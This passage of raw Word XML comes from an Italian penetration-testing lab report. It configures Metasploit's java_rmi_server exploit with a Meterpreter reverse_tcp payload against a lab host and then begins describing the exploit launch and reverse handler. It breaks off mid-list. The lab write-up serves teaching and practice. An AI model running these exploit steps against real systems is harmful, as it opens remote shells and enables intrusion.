        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Si avvia il framework con il comando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> e si seleziona il modulo dedicato al Java RMI Server, configurando i parametri necessari:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000050">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="d9d2f0" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="d9d2f0" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="d9d2f0" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="f3f1fa"/>
        <w:spacing w:before="60" w:beforeAutospacing="0" w:after="160" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2b2153"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>use exploit/multi/misc/java_rmi_server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2b2153"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2b2153"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>set PAYLOAD java/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2b2153"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2b2153"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>set RHOSTS 192.168.11.112</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2b2153"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2b2153"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>set LHOST 192.168.11.111</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2b2153"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2b2153"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>set LPORT 4444</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2b2153"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2b2153"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>set SRVHOST 192.168.11.111</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2b2153"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2b2153"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000051">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La verifica tramite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> conferma la corretta impostazione di tutti i parametri richiesti, riepilogati di seguito.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000052">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="20" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9000" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="c9c0e8" w:sz="2" w:space="0"/>
          <w:left w:val="single" w:color="c9c0e8" w:sz="2" w:space="0"/>
          <w:bottom w:val="single" w:color="c9c0e8" w:sz="2" w:space="0"/>
          <w:right w:val="single" w:color="c9c0e8" w:sz="2" w:space="0"/>
          <w:insideH w:val="single" w:color="c9c0e8" w:sz="2" w:space="0"/>
          <w:insideV w:val="single" w:color="c9c0e8" w:sz="2" w:space="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1900"/>
        <w:gridCol w:w="3100"/>
        <w:gridCol w:w="4000"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="on"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="100010000000"/>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="6d28d9"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000053">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Parametro</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="100001000000"/>
            <w:tcW w:w="3100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="6d28d9"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000054">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Valore</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="100010000000"/>
            <w:tcW w:w="4000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="6d28d9"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000055">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Significato</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000056">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>RHOSTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="3100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000057">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>192.168.11.112</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="4000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000058">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Indirizzo della macchina vittima (target)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="edeaf5"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000059">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>RPORT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="3100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="edeaf5"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000005A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1099</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="4000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="edeaf5"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000005B">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Porta del servizio Java RMI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000005C">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SRVHOST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="3100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000005D">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>192.168.11.111</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="4000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000005E">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Interfaccia locale su cui è esposto il server HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="edeaf5"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000005F">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SRVPORT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="3100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="edeaf5"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000060">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8080</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="4000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="edeaf5"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000061">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Porta del server HTTP che serve il payload JAR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000062">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LHOST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="3100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000063">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>192.168.11.111</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="4000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000064">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Indirizzo su cui è in ascolto il listener Meterpreter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="edeaf5"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000065">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LPORT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="3100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="edeaf5"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000066">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4444</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="4000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="edeaf5"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000067">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Porta del listener per la connessione di ritorno</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000068">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PAYLOAD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="3100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000069">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>java/meterpreter/reverse_tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="4000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000006A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Payload Meterpreter con reverse connection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0000006B">
      <w:pPr>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="57150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22"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3714750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000006C">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="220" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Fig. 5 — Configurazione del modulo exploit/multi/misc/java_rmi_server in Metasploit: impostazione di RHOSTS, LHOST/SRVHOST, LPORT e payload; l'output di show options conferma i parametri (RPORT 1099).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000006D">
      <w:r>
        <w:rPr/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000006E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="220" w:beforeAutospacing="0" w:after="100" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e1b2e"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.2 Lancio dell'exploit e apertura della sessione</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000006F">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Con la configurazione validata si lancia l'attacco tramite il comando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. L'output documenta l'intera catena di sfruttamento:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000070">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>avvio del reverse TCP handler su 192.168.11.111:4444;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000071">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>avvio del server HTTP che pubblica il payload JAR;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000072">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
